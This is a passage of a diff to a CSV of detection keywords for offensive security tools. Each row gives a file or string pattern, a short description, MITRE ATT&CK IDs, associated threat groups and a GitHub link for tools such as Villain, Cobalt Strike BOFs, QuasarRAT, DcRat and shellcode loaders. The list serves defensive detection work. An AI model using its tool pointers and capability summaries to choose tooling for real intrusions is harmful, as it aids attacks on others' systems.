- TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*python3_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*pywerview.py*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*pywhisker.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*pywhisker.py*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*pywhisker-main*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*pywsus.py*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends 
malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*qtc-de/remote-method-guesser*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - 
TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*qtc-de/remote-method-guesser*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*QUAPCInjectAsSystem*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectElevated*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectWithoutPid*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"*Quasar.Client.*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar.exe*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar.Server*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar.sln*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*quasar/Quasar*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar-master.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*QuasarRAT*","offensive_tool_keyword","QuasarRAT","Free. 
Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.Client.*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.exe*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.Server*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.sln*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*quasar/Quasar*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar-master.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*QuasarRAT*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*quentinhardy*msdat*","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","8","764","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z" "*quser.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*quser.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" -"*qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*qwqdanchun/DcRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*qwqdanchun/DcRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*QXh4OEF4eDhBeHg4QXh4OA==*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*r00t-3xp10it*","offensive_tool_keyword","Github Username","Pentest hosting multiple offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -15506,31 +15676,31 @@ "*r1cksec/thoth*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*r2pm -i dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*r4wd3r/Suborner*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*Radare2*","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. 
attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","18644","2911","2023-10-03T21:41:38Z","2012-07-03T07:42:26Z" -"*radius2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*radius2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Radare2*","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. 
